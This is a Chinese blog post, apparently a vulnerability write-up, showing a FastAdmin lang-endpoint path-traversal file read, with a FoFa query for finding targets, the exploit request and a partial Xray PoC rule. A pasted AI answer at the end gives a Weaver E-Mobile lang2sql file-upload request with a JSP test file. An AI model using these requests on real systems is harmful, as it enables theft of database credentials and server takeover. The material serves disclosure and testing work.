fastAdmin lang接口任意文件读取漏洞(内含XrayPoC)

已于 2024-06-18 10:40:30 修改
阅读量1.6k 收藏 1
点赞数 10
文章标签: web安全 安全
于 2024-06-18 10:25:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/WuYSec/article/details/139766056
版权

0x01 漏洞描述

fastAdmin是一款基于ThinkPHP和Bootstrap开发的开源后台管理框架,旨在帮助开发者快速构建高效、灵活的后台管理系统。

fastAdmin存在任意文件读取漏洞,可直接读取数据库配置文件。

0x02 FoFa语句

body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"

0x03 漏洞复现

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

image-20240618101853801

Xray规则:

name: poc-yaml-fastadmin-lang-file-read
transport: http
rules:
  r0:
    request:
      method: GET
      path: /index/ajax/lang?lang=../../application/database
      follow_redirects: false
    
最低0.47元/天 解锁文章
WuY1nSec
关注
FastAdmin后台开发框架 lang 任意文件读取漏洞复现
0xSec
06-17 3838
FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现】泛微OA E-Mobile 移动管理平台 lang2sql 任意文件上传漏洞
alert['Hello World']
06-19 2697
泛微OA E-Mobile 移动管理平台 lang2sql 接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
漏洞复现】FastAdmin——lang——任意文件读取漏洞
LongL_GuYu的博客
06-27 5267
FastAdmin是一个免费开源的后台管理框架,其lang存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。
FastAdmin任意文件读取漏洞
Python_0011的博客
03-07 1104
一、漏洞描述FastAdmin是一款基于ThinkPHP+Bootstrap开发的快速后台开发框架,FastAdmin基于Apache2.0开源协议发布,免费且不限制商业使用,目前被广泛应用于各大行业应用后台管理。astAdmin框架存在任意文件读取漏洞,攻击者利用此漏洞可以获取系统敏感信息。二、影响版本FastAdmin版本 < 1.3.4三、资产测绘app=“FASTADMIN-框架”四、漏洞复现。
fastadmin框架低版本漏洞任意文件读取漏洞(CVE-2024-7928),/index/ajax/lang?lang 修复办法
loricy7的专栏
11-20 1404
通过/index/ajax/lang?lang=en,可以获取到一些敏感文件的信息。关于这个漏洞,是由于旧版本对获取语言标识。官方已于2022年05月30日发布。所以fastadmin框架版本低于。的过滤不严可能导致安全问题。版本,并修复了这个漏洞。对应的数组中添加以下代码。版本,就需要进行修复。方法三:更新框架版本,
漏洞预警】FastAdmin框架任意文件读取漏洞
晚风不及你
06-11 3444
FastAdmin是一个基于ThinkPHP和Bootstrap的快速开发的后台管理系统框架。FastAdmin框架存在文件读取漏洞漏洞,攻击者利用此漏洞可以获取系统敏感信息。
FastAdmin 任意文件读取漏洞复现
网安小白
09-04 1713
FastAdmin 后台框架开源且可以免费商用,一键生成 CRUD, FastAdmin 是一款基于 ThinkPHP 和 Bootstrap 的极速后台开发框架,基于Auth验证的权限管理系统,一键生成 CRUD,自动生成控制器、模型、视图、JS、语言包、菜单、回收站等。(Fast Admin 极速 后台 框架)Fastadmin框架 lang接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 9761
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
抓 Windows 密码,这 7 种技术够不够用!
bigbangbangbang1的博客
12-09 964
内网渗透中,获取到 Windows 系统权限之后,抓取本地哈希是必不可少的操作,今天分享一款工具,集成了 7 种转储 LSASS 内存的方法,工具地址:运行如图:未提供任何参数运行程序,会要求你输入所要指定的方法,参数为 1-7,功能分别对应:使用解除挂钩技术转储 lsass 内存以注入修改后的 mimikatz 二进制文件。使用解除挂钩技术转储 lsass 内存以使用 MDWD 的直接系统调用注入二进制文件。使用简单的 MiniDumpWriteDump API 转储 lsass 内存。
任意文件读取下载漏洞
weixin_48712514的博客
05-19 1712
1. 任意文件读取 一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。 1:敏感信息泄露 2:目录穿越,目录穿透,目录遍历 任意文件读取与下载漏洞原理 1:从权限的角度来讲,读取与下载都是属于读权限 漏洞成因 不管是任意文件读取还是任意文件下载,触发漏洞的条件都是相同的 1:存在读取文件的函数(web应用开放了读取功能) 2:读取文件的路径客户端可控(完全控制) 3:没有对文件路
任意文件读取与下载漏洞学习
不想当脚本小子的脚本小子
01-25 4046
原理: 在web安全中,任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义,就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config。漏洞一般存在于文件下载参数,文件包含参数。主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。 任意文件读取漏洞的原理其实就是由于程..
FastAdmin目录穿越 CVE-2024-7928
iSee857的博客
08-24 1089
Bootstrap开发的快速后台开发框架。FastAdmin基于Apache2.0开源协议发布,免费且不限制商业使用,目前被广泛应用于各大行业应用后台管理。其接口lang存在目录穿越漏洞,攻击者可通过该漏洞获取系统库敏感信息。该漏洞已支持yakit插件检测,根据uuid 39894f51-f782-48eb-bb01-d1e0421b8e9c 进行下载。升级至安全版本:1.3.4.20220530。FastAdmin是一款基于。
Fastadmin框架 lang任意文件读取漏洞攻略(CVE-2024-7928)
2301_78554096的博客
03-25 254
Fastadmin框架lang任意文件读取漏洞攻略
任意文件读取漏洞复现
来日可期的博客
08-31 5040
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
任意文件读取漏洞(CVE-2024-7928)修复
bigwood99的博客
11-26 1541
验证CVE-2024-7928问题是否存在可以使用如下方法:
漏洞挖掘-从任意文件读取漏洞到获取账户利用
m0_60571990的博客
03-07 1449
漏洞挖掘-从任意文件读取漏洞到获取账户利用
学习总结之任意文件读取漏洞(网站敏感数据泄露)
weixin_63694057的博客
06-17 2043
以下内容是我在实践过程中找到的一个任意文件读取漏洞,通过DirBuster发现该域名下存在.zip文件,通过在域名路径下加上该文件即可将这个压缩包下载到我的本地,然后解压发现是该网站的源码,这个漏洞对该企业网站来说影响是很大的,我也提交了该漏洞。原理:攻击者使用各种攻击方式扫描目标网站,寻找未授权访问的漏洞,然后攻击者利用这些漏洞发送特殊请求,获取到网站上存在的敏感信息或者文件;还有phpinfo文件,能够获取到服务器真实IP,一些配置信息如中间件,系统版本,数据库版本等,以及获取到网站根目录。
Fastadmin读取数据库配置
安迪夫的博客
02-22 9270
php代码:\think\Config::get('database')返回数组:[type] =&gt; mysql [dsn] =&gt; [hostname] =&gt; localhost [database] =&gt; fastadmin [username] =&gt; root [password] =&gt; root [hostport] =&gt; [params] =&gt...
fastadmin前台分片漏洞
Fiverya的博客
12-05 3633
参考链接:fastadmin安装fastadmin安装前台分片漏洞复现:https://blog.youkuaiyun.com/weixin_43288600/article/details/121192252https://blog.youkuaiyun.com/u013921288/article/details/117670844https://xz.aliyun.com/t/9395FastAdmin最新RCE漏洞复现https://www.secpulse.com/archives/157307.html搭建好环境后,查
泛微移动管理平台lang2sql接口任意文件上传漏洞测试背景
最新发布
03-30
<think>嗯,用户想了解泛微移动管理平台lang2sql接口任意文件上传漏洞的测试方法和背景。首先,我需要回顾一下已有的引用内容,确保信息准确。根据引用[1]、[2]、[3],这个漏洞主要是因为后端没有对上传的文件进行校验,导致攻击者可以上传任意文件,包括恶意脚本,进而控制服务器。 接下来,测试方法方面,用户可能需要具体的步骤,比如如何构造请求,使用什么工具。通常测试这类漏洞会涉及抓包工具比如Burp Suite,修改上传的数据包,将文件类型改为允许的格式,比如图片,但内容却是PHP或JSP的webshell。同时,需要确认接口的路径,比如引用中提到/lang2sql接口,可能还需要特定的参数或请求头。 背景部分需要解释漏洞的成因,比如缺乏文件类型校验、路径处理不当等。结合引用中的信息,泛微的E-Mobile系统在处理上传时没有进行足够的检查,导致攻击者绕过限制。另外,资产测绘可以通过Fofa搜索product="泛微-EMobile"来找到目标系统。 用户可能还想知道如何验证漏洞是否存在,比如上传一个测试文件后访问返回的路径,检查是否执行。同时,修复建议也是重要的部分,比如升级补丁、加强文件校验、限制执行权限等。 需要注意的是,测试漏洞必须获得授权,否则可能违法。所以回答中要提醒用户这一点,确保合法性。另外,引用中的信息需要正确标注来源,比如引用[1]、[2]、[3]对应的内容,避免误导用户。 总结一下,回答的结构应该包括漏洞背景、技术原理、测试步骤、验证方法和修复建议,同时强调合法测试的重要性。确保使用中文,按照用户的格式要求,分点清晰,并且引用正确来源。</think>### 漏洞背景与原理 泛微OA E-Mobile移动管理平台的`lang2sql`接口存在任意文件上传漏洞,其核心原因是后端未对上传文件进行有效校验。攻击者可通过构造恶意请求,上传包含Webshell等恶意代码的文件至服务器,从而获取系统控制权。该漏洞被归类为高危漏洞,影响范围覆盖使用未修复版本泛微E-Mobile的系统[^1][^2][^3]。 #### 技术原理分解 1. **文件校验缺失**:接口未验证文件扩展名、MIME类型或内容签名,允许上传任意文件类型(如`.php`、`.jsp`) 2. **路径处理缺陷**:上传文件后未对存储路径进行安全限制,可直接通过URL访问 3. **权限配置错误**:上传目录可能具备脚本执行权限 --- ### 漏洞测试方法 #### 步骤1:环境确认 使用Fofa等网络空间测绘引擎搜索目标资产: ```http product="泛微-EMobile" ``` #### 步骤2:构造PoC请求 使用Burp Suite或Postman发送以下HTTP请求: ```http POST /weaver/weaver.lang2sql?type=1 HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="file"; filename="test.jsp" Content-Type: image/jpeg <% out.println("Hello Vuln!"); %> ------WebKitFormBoundaryABC123-- ``` #### 关键测试参数说明 | 参数 | 值示例 | 作用说明 | |------------|--------------------|------------------------------| | filename | test.jsp | 强制指定危险文件扩展名 | | Content-Type| image/jpeg | 伪装合法文件类型绕过前端检测 | #### 步骤3:漏洞验证 访问上传文件路径(通常返回JSON中含存储路径): ```http GET /upload/emobile/webserver/test.jsp HTTP/1.1 Host: target.com ``` --- ### 漏洞验证指标 1. 响应状态码为`200`且显示预期内容 2. 服务器返回包含文件存储路径的JSON响应: ```json {"success":true,"filePath":"/upload/emobile/webserver/test.jsp"} ``` --- ### 修复建议 1. **官方补丁升级**:及时安装泛微官方安全更新 2. **文件校验增强**:增加白名单校验(扩展名、MIME类型、文件头) 3. **权限隔离**:设置上传目录不可执行脚本 4. **WAF防护**:部署规则拦截异常上传请求
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值